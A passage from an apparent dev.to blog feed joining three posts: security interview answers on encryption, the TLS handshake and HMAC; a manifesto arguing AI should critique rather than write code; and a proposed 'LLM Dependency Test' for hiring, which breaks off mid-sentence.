key is used to encrypt<br> data and a separate key is used to decrypt data. This field begain<br> with the invention of Diffie-Hellman Key Exchange by cryptographers<br> Diffie Whitfield, Martin Hellman, and Ralph Merkle. Asymmetric<br> Encryption is featured in digital signatures and public-key encryption.</p> <p>Unfortunately asymmetric key encryption is harder to use than<br> symmetric-key encryption--and this is arguably the biggest hurdle<br> to its adoption. Even as late as 2022 CE NIST admits it should take<br> two whole decades for organizations to adopt the new post-quantum<br> safe public-key algorithms NIST standardized. Classical Asymmetric<br> -Key Encryption is vulnerable to Shor's Algorithm--an algorithm<br> that a quantum supercomputer can execute to crack the private key<br> featured in classical asymmetric-key encryption.</p> <p>Some examples of algorithms that fall under symmetric-key cryptography:</p> <p>AES, HMAC-SHA-256, Argon2ID</p> <p>Some examples of asymmetric-key encryption algorithms:</p> <p>Diffie-Hellman Key Exchange, RSA, Kyber-1024, Dilithium</p> <blockquote> <p><strong>Curriculum anchor:</strong> Week 5 — cryptography basics. ★ Indispensable. Pre-loaded from Intel ChaCha20 (symmetric) + XMSS (asymmetric post-quantum signatures).</p> </blockquote> <h2> Q8 — Describe the TLS Handshake </h2> <p>The following gives the steps for the Handshake:</p> <ol> <li> <p>Client sends ClientHello Message:</p> <p>a. Details which algorithms the client wants to use.</p> <p>b. Client sends it public key for key exchange in this message</p> </li> <li> <p>Server responds with ServerHello:</p> <p>a. Tells client which algorithm(s) the server chose.</p> <p>b. Client recives server's public key for key exchange</p> </li> </ol> <p>2.5. Both Client and Server independenty derive premaster secret<br> from ECDHE shared secret. The ECDHE shared secret is derived during<br> ECDHE key exchange. Used later in MAC verification to verify<br> no MITM attack took place during TLS Handshake.</p> <ol> <li> <p>Server sends TLS Certificate to client</p> <p>a. Has server's public key and identity information</p> <p>b. Includes certificate chain.</p> </li> <li> <p>Server sends CertificateVerify message.</p> <p>a. Contains signature over ClientHello + ServerHello +<br> Certificate Transcript.</p> <p>b. This proves server owns the private key corresponding to<br> the public key in the TLS certificate.</p> </li> <li> <p>Server sends "Finished" Message with MAC</p> <p>a. Contains a MAC over the entire handshake transcript.</p> <pre class="highlight plaintext"><code>i. Client must first verify public key in TLS </code></pre> <p>Certificate is valid before verifying MAC. This avoids the<br> Diffie-Hellman MITM where the attacker sends ECDHE public keys<br> to victim whose private keys the attacker has knowledge of.</p> </li> <li> <p>Client verifies TLS Certificate Chain</p> <p>a. Starting from TLS Certificate of the website, past<br> Intermediate Certificates, up to the Root TLS Certificate of the<br> website. All signatures must be valid. If at any point a signature is<br> found to be invalid the client must reject the TLS certificate and<br> refuse to establish a TLS connection with the website. At that point it<br> is possible the website is a fake.</p> </li> <li> <p>Client Derives Session Keys to Verify MAC</p> <p>a. Client derives session keys using HKDF from premaster<br> secret to verify MAC Server sent over TLS Handshake Transcript (<br> ClientHello + ServerHello + TLS Certificate). This proves no MITM<br> attack took place.</p> </li> <li> <p>Client sends "Finished" Message</p> <p>a. Client reports it finished verifying server's identity by<br> sending "Finished" message</p> <p>b. Client sends a MAC to server over entire handshake<br> transcript. Server verifies MAC is correct. This proves there<br> was not MITM in the handshake process.</p> </li> <li> <p>Encrypted Communication Between Client and Server Begins</p> <p>a. Encrypted Communication in TLS takes place in TLS 1.3<br> with AEAD ciphers.</p> </li> </ol> <blockquote> <p><strong>Curriculum anchor:</strong> Week 2 — TLS/HTTPS networking. ★ Indispensable.</p> </blockquote> <h2> Q9 — How Does HMAC Work? </h2> <p>A Hash-based Message Authentication Code is built on a cryptographic<br> message digest. To use an HMAC a user must supply a secret key<br> and a document as two arguments. The HMAC will generate an ID<br> number unique to the secret key and document pair. The recipient<br> of a message can then verify that a message was truly sent<br> by the alleged sender by recalculating the HMAC and verifying the<br> HMAC sent by the sender matches the one the recipient recalculated.</p> <p>Security Engineering Interviews care less on the math behind<br> how algorithms work and more on how to make use of them.</p> <blockquote> <p><strong>Curriculum anchor:</strong> Week 5 — cryptography basics. Pre-loaded from Intel crypto implementations.</p> </blockquote> <h2> Q10 — Why Is HMAC Designed the Way It Is? </h2> <p>Resource: Understanding Cryptography Second Edition <sup id="fnref3">3</sup></p> <p>HMACs are designed the way they are to avoid common attacks against<br> MACs: including the suffix and prefix attacks--and HMACs are designed<br> the way they are since they make use of cryptographic message digest<br> functions--which are widely available in software cryptographic<br> libraries to implement and are much easier to program securely<br> than block ciphers--the alternative building block used to make<br> a MAC. HMACs are widely used instead of MACs built on block ciphers<br> since HMACS are easier to prove to be secure even if the hash<br> featured in HMAC is found to be weak against collision resistance or<br> weak in second preimage resistance--under certain assumptions.</p> <blockquote> <p><strong>Source:</strong> <em>Understanding Cryptography</em>, 2nd Edition (Christof Paar &amp; Jan Pelzl). <sup id="fnref3">3</sup></p> <p><strong>Curriculum anchor:</strong> Week 5 — cryptography basics. ★ Indispensable.</p> </blockquote> <h2> Where These Questions Sit in the Curriculum </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Question</th> <th>★ Indispensable?</th> <th>Curriculum Week</th> <th>Status</th> </tr> </thead> <tbody> <tr> <td>Q1 — TCP Three-Way Handshake</td> <td>★ Yes</td> <td>Week 1</td> <td>✅ Pre-loaded</td> </tr> <tr> <td>Q2 — How Cookies Work</td> <td>★ Yes</td> <td>Week 6</td> <td>🔵 Near-term</td> </tr> <tr> <td>Q3 — How Sessions Work</td> <td>No</td> <td>Week 6</td> <td>🔵 Near-term</td> </tr> <tr> <td>Q4 — OAuth2</td> <td>★ Yes</td> <td>Week 12</td> <td>🟣 Build toward</td> </tr> <tr> <td>Q5 — JWT</td> <td>★ Yes</td> <td>Week 6</td> <td>🔵 Near-term</td> </tr> <tr> <td>Q6 — PKI Flow</td> <td>No</td> <td>Week 5</td> <td>✅ Pre-loaded</td> </tr> <tr> <td>Q7 — Symmetric vs. Asymmetric</td> <td>★ Yes</td> <td>Week 5</td> <td>✅ Pre-loaded</td> </tr> <tr> <td>Q8 — TLS Handshake</td> <td>★ Yes</td> <td>Week 2</td> <td>✅ Pre-loaded</td> </tr> <tr> <td>Q9 — HMAC</td> <td>No</td> <td>Week 5</td> <td>✅ Pre-loaded</td> </tr> <tr> <td>Q10 — Why HMAC Is Designed That Way</td> <td>No</td> <td>Week 5</td> <td>✅ Pre-loaded</td> </tr> </tbody> </table></div> <h2> What's Next </h2> <p>Part 2 will cover <strong>Q11–Q17</strong> — the remainder of Section A — including Perfect Forward Secrecy, data-at-rest encryption strategy, authentication vs. authorization, and Kerberos/Diffie-Hellman/RSA distinctions.</p> <p>Part 3 will move into <strong>Section B: Network Security, Protocols &amp; Logging</strong> — the largest section at 36 questions.</p> <h2> References </h2> <p><em>This post is part of my public Security Engineering interview prep series. I am building toward a full-time Security Engineering role and maintaining an open-source project — <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">SecEng-Exercises on GitHub</a> — that curates high-quality, secure code datasets to train AI to write more secure code. Follow along on <a href="https://dev.to/fosres">Dev.to</a>.</em></p> <ol> <li id="fn1"> <p>Justin Richer &amp; Antonio Sanso. <em>OAuth 2 in Action</em>. Manning Publications, 2017. p. 23 — Authorization Code grant flow and PKCE extension. ↩</p> </li> <li id="fn2"> <p>JSON Web Tokens — Introduction. <a href="https://jwt.io/introduction" rel="noopener noreferrer">jwt.io/introduction</a>. ↩</p> </li> <li id="fn3"> <p>Christof Paar &amp; Jan Pelzl. <em>Understanding Cryptography</em>, 2nd Edition. Springer, 2010. HMAC construction and attack analysis. ↩</p> </li> </ol> security appsec interview netsec fosres Sun, 22 Mar 2026 17:12:48 +0000 https://dev.to/fosres/let-humans-write-let-ai-critique-a-manifesto-for-security-engineers-jg8 https://dev.to/fosres/let-humans-write-let-ai-critique-a-manifesto-for-security-engineers-jg8 <blockquote> <p><strong>The evidence is in.</strong> AI-generated code ships more security vulnerabilities than human-written code. The solution is not to abandon AI — it is to use it for what it actually does well: <strong>finding flaws before the code exists.</strong></p> </blockquote> <p>Therefore let humans design and write code. Let AI critique every stage of development.</p> <h2> 01 — The Problem Is Not That AI Exists. It Is That We Gave It the Pen. </h2> <p>Every week another team mandates AI coding assistants. Every quarter another report confirms the same thing: the code those assistants write is measurably less secure than code written by a careful human developer. This is not a matter of opinion. The data is replicated across multiple independent studies, multiple languages, and multiple AI models.</p> <blockquote> <p><em>"Critical and major defects are up to 1.7x higher in AI-authored changes. Logic and correctness issues rise 75%, including business logic errors, misconfigurations, and unsafe control flow. Security vulnerabilities rise 1.5–2x, especially improper password handling and insecure object references."</em></p> <p>— <strong>CodeRabbit, State of AI vs Human Code Generation Report, December 2025</strong> (470 open-source GitHub PRs)</p> </blockquote> <p>The pattern holds at the architectural level, not just the line level. When Apiiro analyzed Fortune 50 enterprise repositories, the findings were significantly more severe than surface-level vulnerability counts suggest.</p> <blockquote> <p><em>"Our analysis shows trivial syntax errors in AI-written code dropped by 76%, and logic bugs fell by more than 60%. But the tradeoff is dangerous: those shallow gains are offset by a surge in deep architectural flaws. Privilege escalation paths jumped 322%, and architectural design flaws spiked 153%. These are the kinds of issues scanners miss and reviewers struggle to spot – broken auth flows that look correct but aren't."</em></p> <p>— <strong>Apiiro, 4× Velocity, 10× Vulnerabilities: AI Coding Assistants Are Shipping More Risks, September 2025</strong></p> </blockquote> <p>AI is excellent at eliminating shallow bugs — the typos, the off-by-ones, the missing null checks. It fails precisely where it is most dangerous to fail: trust boundaries, authorization logic, cryptographic implementation, and the systemic design flaws that span multiple files and services.</p> <h3> By the numbers </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Stat</th> <th>Source</th> </tr> </thead> <tbody> <tr> <td> <strong>1.7×</strong> more security vulnerabilities in AI-authored PRs vs. human PRs</td> <td>CodeRabbit, Dec 2025</td> </tr> <tr> <td> <strong>322%</strong> increase in privilege escalation paths with AI coding assistants</td> <td>Apiiro, Sep 2025</td> </tr> <tr> <td> <strong>37.6%</strong> increase in critical vulnerabilities after just 5 AI refinement iterations</td> <td>arXiv:2506.11022, IEEE-ISTAS 2025</td> </tr> <tr> <td> <strong>45%</strong> of AI-generated code samples failed security tests across 100+ LLMs</td> <td>Veracode GenAI Code Security Report, 2025</td> </tr> </tbody> </table></div> <h2> 02 — Asking AI to Revise Its Own Code Makes It Worse, Not Better. </h2> <p>An intuitive response to insecure AI-generated code is to prompt the AI to fix it. Ask it to review, to harden, to patch. This is the wrong instinct. The research is unambiguous: iterative AI refinement degrades security rather than improving it.</p> <blockquote> <p><em>"This paper analyzes security degradation in AI-generated code through a controlled experiment with 400 code samples across 40 rounds of 'improvements' using four distinct prompting strategies. Our findings show a 37.6% increase in critical vulnerabilities after just five iterations, with distinct vulnerability patterns emerging across different prompting approaches. This evidence challenges the assumption that iterative LLM refinement improves code security and highlights the essential role of human expertise in the loop."</em></p> <p>— <strong>Shukla, Joshi &amp; Syed, Security Degradation in Iterative AI Code Generation: A Systematic Analysis of the Paradox, arXiv:2506.11022, accepted IEEE-ISTAS 2025</strong></p> </blockquote> <p>The mechanism is not accidental. Each refinement pass takes the previous output as ground truth, compounding flaws rather than eliminating them. An authorization bug introduced in iteration one is baked deeper into the architecture by iteration five. The AI has no threat model for your system. It has patterns. And it applies them recursively.</p> <blockquote> <p><em>"LLMs don't understand your architecture, context, or risk - they mimic patterns, not purpose. A fix that looks right might violate your access control model. A cleanup might strip away a critical logging statement. And unless someone's there to catch it, you'll only find out when it's too late."</em></p> <p>— <strong>Symbiotic Security, Exploring Security Degradation in Iterative AI Code Generation, July 2025</strong></p> </blockquote> <h2> 03 — The One Variable That Reduces Vulnerabilities: Trust the AI Less. </h2> <p>This finding from Stanford is the most important result in this entire literature for practicing security engineers. It does not say AI is useless. It says the engineers who got better security outcomes were the ones who engaged critically — who questioned, rephrased, and rejected AI suggestions rather than accepting them.</p> <blockquote> <p><em>"...participants who had access to an AI assistant wrote significantly less secure code than those without access to an assistant. Participants with access to an AI assistant were also more likely to believe they wrote secure code, suggesting that such tools may lead users to be overconfident about security flaws in their code."</em></p> <p>— <strong>Perry, Srivastava, Kumar &amp; Boneh (Stanford/UC San Diego), Do Users Write More Insecure Code with AI Assistants? ACM CCS 2023, arXiv:2211.03622</strong></p> </blockquote> <p>This is not a call to stop using AI. It is a precise description of <em>how</em> to use it. The security benefit does not come from AI generating code. It comes from human judgment evaluating AI criticism. Those are structurally different workflows with measurably different outcomes.</p> <blockquote> <p><strong>"The security benefit comes from human judgment evaluating AI criticism — not from AI generating code."</strong></p> </blockquote> <h2> 04 — What AI Actually Does Well: Finding Flaws Before the Code Exists. </h2> <p>There is real positive evidence for AI in security — but it is concentrated in AI as a <em>reviewer and critic</em>, not as a writer. The Gemini user study published in March 2026 found meaningful reductions in specific vulnerability categories when developers used AI assistance for review.</p> <blockquote> <p><em>"When considering the individual vulnerabilities, Gemini assistance led to approximately 21.7% fewer vulnerabilities in password storage and 10.5% fewer in SQL vulnerabilities. However, participants still faced challenges, such as Gemini suggesting outdated libraries or omitting hashing recommendations. XSS vulnerabilities were improved by only 3.5% with the use of Gemini. CSRF and improper input validation seemed almost not to be influenced by Gemini usage."</em></p> <p>— <strong>Jost et al., The Impact of AI-Assisted Development on Software Security: A Study of Gemini and Developer Experience, arXiv:2603.15298, March 2026</strong></p> </blockquote> <p>The pattern is clear: AI critique of specific, well-defined security properties helps. AI as an autonomous author does not. The right architecture for your workflow follows directly from that finding.</p> <p>This maps to what software engineering has understood for decades about defect economics. Catching a design flaw at the requirements stage costs nearly nothing. Catching it in production costs orders of magnitude more. AI critics operating at the design, architecture, and specification stage apply pressure exactly where it is cheapest to respond to it.</p> <blockquote> <p><em>"Finding and fixing vulnerabilities in production is orders of magnitude more expensive than preventing them during development. A skilled development team will write fewer insecure lines of code, resulting in fewer security findings, less rework, and a faster, more efficient delivery cycle."</em></p> <p>— <strong>SANS Institute, Why Security Tools Alone Won't Secure Your Code — and What Developers Really Need, September 2025</strong></p> </blockquote> <h2> 05 — The Workflow: AI as Critic at Every Stage of the SDLC. </h2> <p>The principle is simple. <strong>Humans write. AI criticizes. At every stage.</strong> Not after the code is written and shipped — at every decision point in the development lifecycle, from requirements through architecture through implementation to review. Here is what that looks like in practice.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Stage</th> <th>Role</th> </tr> </thead> <tbody> <tr> <td><strong>Requirements</strong></td> <td> <strong>AI Critic asks:</strong> What are the trust boundaries here? Who can call this? What data flows through it? What invariants must hold? Human defines the security requirements based on that challenge.</td> </tr> <tr> <td><strong>Architecture</strong></td> <td> <strong>AI Critic asks:</strong> Where are the privilege escalation paths? What happens if this service is compromised? What data does each component have access to? Human redesigns based on STRIDE analysis of the critique.</td> </tr> <tr> <td><strong>API Design</strong></td> <td> <strong>AI Critic asks:</strong> Is authorization checked at the right layer? What happens with a null input, a unicode bomb, an oversized payload? Human writes the spec that answers those questions.</td> </tr> <tr> <td><strong>Implementation</strong></td> <td> <strong>Human writes the code.</strong> AI does not author it. AI may be asked to explain a library's security properties, or to confirm that a proposed pattern is safe — but the implementation decision is human.</td> </tr> <tr> <td><strong>Code Review</strong></td> <td> <strong>AI scans for pattern-based issues:</strong> Semgrep, Bandit, CodeQL. Human triages findings against the threat model established in earlier stages. AI cannot determine exploitability — that judgment is human.</td> </tr> </tbody> </table></div> <p>This workflow is consistent with OWASP's own guidance on AI-assisted development, published in the OWASP Top 10 2025 Next Steps section:</p> <blockquote> <p><em>"You should be able to read and fully understand all code you submit, even if it is written by an AI or copied from an online forum. You are responsible for all code that you commit. You should review all AI-assisted code thoroughly for vulnerabilities, ideally with your own eyes and also with security tooling made for this purpose (such as static analysis)."</em></p> <p>— <strong>OWASP Top 10 2025 — Next Steps (X01:2025), owasp.org/Top10/2025/X01_2025-Next_Steps/</strong></p> </blockquote> <h2> 06 — The Expert Advantage: Threat Modeling Is What the AI Cannot Replicate. </h2> <p>The reason experienced security engineers get better outcomes from this workflow than junior developers is precisely because AI criticism is only as useful as the human evaluating it. The AI surfaces a list of concerns. The expert maps each concern against a real threat model — your specific system, your actual attack surface, your deployment context.</p> <blockquote> <p><em>"AI can accelerate the mechanics of threat modeling, but developers still need to understand the fundamentals: how to think about trust boundaries, how to identify assets worth protecting, and how to anticipate how attackers might abuse a feature."</em></p> <p>— <strong>CSO Online, The New Paradigm for Raising Up Secure Software Engineers, February 2026</strong></p> </blockquote> <p>This is not a reason for junior engineers to abandon the workflow. It is a reason for organizations to invest in security fundamentals alongside AI tooling. The OpenSSF has documented precisely what those fundamentals look like in the context of AI code assistants.</p> <blockquote> <p><em>"Assume AI-written code can have bugs or vulnerabilities, because it often does. AI coding assistants can introduce security issues like using outdated cryptography or outdated dependencies, ignoring error handling, or leaking secrets."</em></p> <p>— <strong>OpenSSF Best Practices Working Group, Security-Focused Guide for AI Code Assistant Instructions, best.openssf.org</strong></p> </blockquote> <h2> The Principles. With Their Sources. </h2> <p>→ <strong>Humans write the code.</strong> AI-generated code ships 1.7× more security vulnerabilities than human-written code in production repositories.<br> <em>— CodeRabbit State of AI vs Human Code Generation, Dec 2025</em></p> <p>→ <strong>Do not ask AI to fix its own output.</strong> After five AI refinement iterations, critical vulnerabilities increase by 37.6%.<br> <em>— Joshi et al., arXiv:2506.11022, IEEE-ISTAS 2025</em></p> <p>→ <strong>AI is a critic, not a coauthor.</strong> Engaging critically with AI output — not accepting it passively — is what produces fewer vulnerabilities.<br> <em>— Perry, Srivastava, Kumar &amp; Boneh, ACM CCS 2023, arXiv:2211.03622</em></p> <p>→ <strong>Critique at design time is cheaper than scanning at ship time.</strong> Finding and fixing vulnerabilities in production costs orders of magnitude more than preventing them at design.<br> <em>— SANS Institute, September 2025</em></p> <p>→ <strong>Threat modeling is the human skill AI cannot replace.</strong> AI surfaces concerns. Experts map them against real threat models.<br> <em>— CSO Online, February 2026</em></p> <p>→ <strong>You are responsible for all code you commit</strong>, regardless of whether AI suggested it.<br> <em>— OWASP Top 10 2025, X01:2025 Next Steps</em></p> <h2> Want to Practice This? </h2> <p>I'm building a repository of <strong>LeetCode-style secure coding exercises</strong> — the kind of challenges that train the threat modeling instinct this workflow depends on. Each exercise includes a 60+ test suite and a companion post.</p> <p>If you think high-quality, human-written secure code is the right training data for AI models, and you want to practice writing it yourself:</p> <p><strong>⭐ <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">Star the repo on GitHub → github.com/fosres/SecEng-Exercises</a></strong></p> <p>Every star helps the project reach more security engineers who want to sharpen this exact skill.</p> <h2> One Quick Question </h2> <p>I write these posts to be useful, and I want to know what's actually useful to you.</p> <p><strong><a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">→ Take the 30-second poll: Why do you read my blog posts?</a></strong></p> <p>No signup, no email — just one click. The results directly shape what I write next.</p> <p><em>Security Engineering Series · dev.to/fosres · March 2026 · All citations link to primary sources</em></p> security ai appsec devsecops fosres Sun, 22 Mar 2026 02:57:42 +0000 https://dev.to/fosres/the-llm-dependency-test-a-new-way-to-interview-software-engineers-in-the-age-of-ai-c8m https://dev.to/fosres/the-llm-dependency-test-a-new-way-to-interview-software-engineers-in-the-age-of-ai-c8m <h1> The LLM Dependency Test: A New Way to Interview Software Engineers in the Age of AI </h1> <p><strong>Tags:</strong> <code>ai</code>, <code>career</code>, <code>security</code>, <code>productivity</code></p> <p>The Pentagon recently discovered that it could not comply with its own Secretary of Defense's direct order to remove an AI tool from its weapons targeting system. Not because the order was classified. Not because of a bureaucratic delay. Because the targeting workflows were so deeply embedded in that single commercial AI that the military — with a $900 billion annual budget and the entire US defense industrial base behind it — literally could not finish the job without it.</p> <p>The same week, Pentagon staff resorted to Microsoft Excel to handle tasks previously managed by the AI.</p> <p>This is not a story about the Pentagon. This is a story about every software team that has quietly built itself into the same trap — just at a smaller scale and with lower stakes.</p> <h2> The Problem Nobody Is Naming </h2> <p>There is a growing and largely unacknowledged skill crisis forming underneath the surface of AI-assisted software development.</p> <p>A generation of engineers is learning to build with AI as a first-class team member. They are shipping features faster, writing tests more confidently, navigating unfamiliar codebases with ease. By every observable metric, they are more productive than engineers who came before them.</p> <p>But strip away the AI — network outage, service disruption, vendor dispute, policy change — and a disturbing number of them cannot finish what they started.</p> <p>The problem is not that they use AI. The problem is that the AI has become load-bearing infrastructure in their cognitive workflow. The understanding of what is being built, the reasoning behind architectural decisions, the ability to close the last 10% of a project under pressure — all of it has migrated into the chat window.</p> <p>When the chat window goes dark, so does the team.</p> <h2> The Horror Story Is Real </h2> <p>On March 17, 2026, Claude went down for roughly five hours. Over 6,800 users reported problems. Developers working in Claude Code described it as a "snow day." They were mid-project. They stopped. <em>(Source: <a href="https://rollingout.com/2026/03/17/claude-ai-outage-anthropic-downdetector/" rel="noopener noreferrer">6,800 users report Claude AI down in major today outage</a>, Rolling Out, March 17, 2026)</em></p> <p>That is the benign version of the story. A team misses a deadline. A deployment slips. A demo gets rescheduled.</p> <p>The catastrophic version is Palantir's Maven Smart System — a billion-dollar defense platform for intelligence analysis and weapons targeting — built so thoroughly on Claude Code prompts and workflows that recertifying it with a replacement model will take twelve to eighteen months according to defense contractors. Meanwhile the military is using it anyway, in an active conflict, in defiance of its own Secretary's order, because there is no alternative ready.</p> <blockquote> <p><em>"Removing Claude will be a major undertaking. For example, Palantir's Maven Smart Systems — a software platform that supplies militaries with intelligence analysis and weapons targeting — uses multiple prompts and workflows that were built using Anthropic's Claude Code... Palantir will have to replace Claude with another AI model and rebuild parts of its software."</em></p> <p>— Reuters / Military Times, <a href="https://www.militarytimes.com/news/pentagon-congress/2026/03/19/hegseth-wants-pentagon-to-dump-claude-but-military-users-say-its-not-so-easy/" rel="noopener noreferrer">Hegseth wants Pentagon to dump Claude, but military users say it's not so easy</a>, March 19, 2026</p> <p><em>"Tasks previously handled by Claude, such as querying large datasets for information, are in some cases now being done manually with tools such as Microsoft Excel."</em></p> <p>— Reuters / U.S. News, <a href="https://www.usnews.com/news/top-news/articles/2026-03-19/hegseth-wants-pentagon-to-dump-anthropics-claude-but-military-users-say-its-not-so-easy" rel="noopener noreferrer">Hegseth Wants Pentagon to Dump Anthropic's Claude, but Military Users Say It's Not So Easy</a>, March 19, 2026</p> <p><em>"An internal Pentagon memo said use of Anthropic's tools may continue beyond the six-month period if deemed 'mission-critical' with no viable alternative."</em></p> <p>— CNBC, <a href="https://www.cnbc.com/2026/03/12/karp-palantir-anthropic-claude-pentagon-blacklist.html" rel="noopener noreferrer">Palantir is still using Anthropic's Claude as Pentagon blacklist plays out</a>, March 12, 2026</p> </blockquote> <p>The underlying engineering failure is identical in both cases. A single external dependency became load-bearing. No fallback was built. The humans forgot how to execute without the tool.</p> <h2> Introducing the LLM Dependency Test </h2> <p>What if we could identify this problem before we hire — or before we deploy — rather than discovering it at the worst possible moment?</p> <p>Here is a proposed interview format that directly measures the skill that actually matters:</p> <p><strong>Phase 1 — AI-Assisted Development</strong></p> <p>The candidate begins working on a novel software project with full access to their preferred LLM assistant. The project is unique to each candidate and each session. The AI helps them build. The candidate directs, reviews, and integrates the output. This phase continues for a set window of time — say, sixty to ninety minutes.</p> <p><strong>Phase 2 — The Cutoff</strong></p> <p>At a moment chosen at random within Phase 1, the AI is cut. No warning. No graceful transition. The service simply becomes unavailable, exactly as it would in a real outage.</p> <p><strong>Phase 3 — The Finish</strong></p> <p>The candidate must complete the remaining work without any LLM assistance. They have access to documentation, Stack Overflow, their own notes — everything a working engineer would have. Just not the AI.</p> <p><strong>The Evaluation</strong></p> <p>The test measures two things simultaneously:</p> <p>First, what did the candidate do <em>before</em> the cutoff? Did they write clear comments? Did they commit incrementally? Did they ask the AI clarifying questions that forced explicit specification? Or did they passively accept generated output without building their own understanding of it? Their behavior during the AI-assisted phase reveals their architecture instincts.</p> <p>Second, what do they do <em>after</em> the cutoff? Do they panic or shift gears? Can they read the AI-generated code they were steering and continue it coherently? Can they close the gap between where they are and a working deliverable?</p> <p>A candidate who passes is not just good at using AI. They are good at engineering. The AI made them faster. Their fundamentals make them resilient.</p> <h2> What the Test Is Really Measuring </h2> <p>This test does not measure raw coding speed. It does not measure prompt engineering skill. It does not measure whether a candidate has memorized syntax or API signatures.</p> <p>It measures <strong>mental model quality</strong>.</p> <p>If a candidate genuinely understood the project as it was being built — if they were directing the AI rather than following it — then the cutoff is an inconvenience. They know what remains. They know why each piece exists. They can continue.</p> <p>If the candidate was watching the AI generate and clicking accept, the cutoff is a wall. They have working code they do not understand, a half-finished project with undocumented reasoning, and no map forward.</p> <p>The test surfaces the difference in about fifteen minutes.</p> <h2> The Architectural Principle Behind the Test </h2> <p>The insight the test is built on is simple: <strong>the dependency on AI is not the problem. The architecture of that dependency is.</strong></p> <p>A surgeon using a robotic system is not helpless when the system malfunctions — because their manual surgical skills are maintained. The robot made them more precise, not more dependent. Their training preserved the fallback.</p> <p>An engineer who builds with AI as acceleration on top of solid fundamentals is not helpless when the AI goes down. The AI made them faster, not dependent. Their fundamentals preserved the fallback.</p> <p>The test identifies which kind of engineer you are hiring. Not by asking. By showing.</p> <h2> Why This Matters More in Security Engineering </h2> <p>For security engineers specifically, the stakes of AI dependency are compounded.</p> <p>AI coding agents introduced into security workflows — for code review, vulnerability scanning, threat modeling — generate working outputs that can appear correct while containing subtle flaws. The DryRun Security study from March 2026 found that Claude Code, OpenAI Codex, and Google Gemini all introduced broken access control, OAuth implementation failures, and business logic vulnerabilities into every application they were tasked to build from scratch.</p> <p>A security engineer who cannot independently audit AI-generated code is not a security engineer. They are a human rubber stamp on an AI output pipeline.</p> <p>The LLM Dependency Test applied to a security engineering candidate would reveal immediately whether they can actually read and reason about code — or whether they can only steer an AI that reads and reasons for them.</p> <p>In security, that distinction is the difference between a defended system and a breach waiting to happen.</p> <h2> The Second-Order Effect </h2> <p>Here is the part of this proposal I find most interesting.</p> <p>The moment a test like this exists and becomes known in the industry, it changes how candidates prepare. Engineers who know they will face a mid-project AI cutoff in their interviews cannot afford to let their fundamentals atrophy. They have to actually build their skills without the AI, not just alongside it.</p> <p>The test does not just filter for the right candidates. It shapes the behavior of the candidate pool before anyone sits down to take it.</p> <p>Most interview formats test for skills that candidates develop in order to pass the interview. This test forces candidates to develop the skill that protects them — and the teams that hire them — for the rest of their careers.</p> <h2> A Note on What This Is Not </h2> <p>This is not an argument against using AI tools. Engineers who use AI assistants well are genuinely more productive. The data is clear on that.</p> <p>This is an argument for using AI tools in the right architectural relationship — as acceleration on top of maintained human capability, not as a replacement for it.</p> <p>The Pentagon did not fail because it used AI. It failed because it forgot to remain capable without it. The distinction is everything.</p> <h2> The Challenge to the Industry </h2> <p>If you are running engineering interviews in 2026, consider adding a version of this test to your process. The implementation details are yours to design — the cutoff timing, the project scope, the evaluation rubric. But the core structure is sound.</p> <p>If you are preparing for engineering interviews, consider what it would mean to face this test unprepared. Then build accordingly.</p> <p>And if you are an engineering manager who has watched your team slow-roll to a halt every time a major AI service goes down — you already know what this test is measuring. The question is whether you hire for it before the next outage, or discover the gap during one.</p> <p><em>This post is based on a conversation about AI-assisted software engineering, the March 2026 Anthropic-Pentagon dispute, and what the engineering profession is not yet asking about AI dependency. The LLM Dependency Test concept was proposed by Tanveer Salim.</em></p> <h2> The Throughput Problem — And Why Option 3 Solves It </h2> <p>After I proposed the LLM Dependency Test, a sharp critic raised a problem the test does not fully address.</p> <p>Even if a candidate passes — even if they perfectly understand the codebase and can articulate exactly what remains — they still face a <strong>physics problem</strong>. Modern projects are scoped assuming AI-assisted velocity. An engineer producing 50-100 lines of considered code per hour cannot close the gap left by an AI that was generating 10x that. Understanding the remaining 10% does not mean finishing it on time.</p> <p>This is a real limitation. And it points to something the industry has not formally addressed: <strong>project planning in the AI era has a hidden assumption baked into every timeline — that the AI will be available for the full duration.</strong></p> <p>There are three architectural responses to this problem.</p> <p><strong>Option 1 — Scope conservatively from the start.</strong> Plan every project at human velocity. Treat AI as pure acceleration that moves you ahead of schedule, never as the baseline the schedule depends on. If the AI goes down, you're early. If it stays up, you're very early. This is architecturally correct but almost nobody does it — because it makes estimates look padded, and management eventually recalibrates expectations upward until the buffer disappears. You've solved nothing structurally, just temporarily.</p> <p><strong>Option 2 — Build multi-model redundancy into the workflow.</strong> If one AI goes down, a fallback model — Gemini, GPT-5, a local Llama variant — picks up immediately. The throughput gap shrinks dramatically when the fallback is another AI rather than a human alone. This is achievable today and is the most practical answer for teams that cannot afford conservative scoping. However, Option 2 carries a vulnerability that is easy to miss: it is subject to <strong>Brook's Law</strong>. Fred Brooks observed in <em>The Mythical Man-Month</em> (1975) that adding manpower to a late software project makes it later — because new participants require onboarding time, ramp-up, and context transfer that consumes more capacity than they contribute in the short term. An unplanned fallback AI faces the exact same problem. It has no context. It has not seen the conversation history, the architectural decisions, the intermediate reasoning, or the implicit constraints the primary AI accumulated across the session. Re-establishing that context takes time — time the team does not have mid-crisis. The fallback AI is not a drop-in replacement. It is a new team member arriving at the worst possible moment, and Brook's Law applies regardless of whether that new member is human or machine.</p> <p><strong>Option 3 — Modular milestones at AI-independent checkpoints.</strong> Structure every project so that each meaningful increment is independently completable and shippable at human velocity. The AI makes each increment faster, but no increment <em>requires</em> the AI to exist. If the AI disappears, you ship what is done. The remaining work moves to the next release.</p> <p>Option 3 is the right answer — and the reasoning is worth unpacking.</p> <h3> Why Option 3 Distributes Risk Instead of Concentrating It </h3> <p>Options 1 and 2 both carry hidden failure modes. Option 1 trades throughput risk for scope credibility risk. Option 2 trades single-vendor dependency for multi-vendor coordination complexity. Option 3 does something different: it changes the <strong>shape</strong> of the risk entirely.</p> <p>When a project is built as one long AI-assisted arc toward a single deadline, all risk concentrates at the end. An outage at 90% completion is maximally catastrophic — you are closest to done and furthest from any shippable state. The team has nothing to show and everything to explain.</p> <p>When a project is built as a sequence of independently shippable modules, risk is distributed across the timeline. An outage at any point means you have something real to 